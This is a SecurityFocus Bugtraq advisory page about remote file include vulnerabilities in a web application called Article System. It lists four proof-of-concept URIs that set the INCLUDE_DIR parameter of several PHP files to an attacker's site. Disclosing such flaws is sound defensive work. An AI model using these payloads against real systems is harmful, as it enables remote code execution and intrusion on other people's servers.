Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Article System Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://example.com/[script_path]/include/forms.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/issue_edit.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/client.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/classes.php?INCLUDE_DIR=attacker's site







 

Privacy Statement
Copyright 2009, SecurityFocus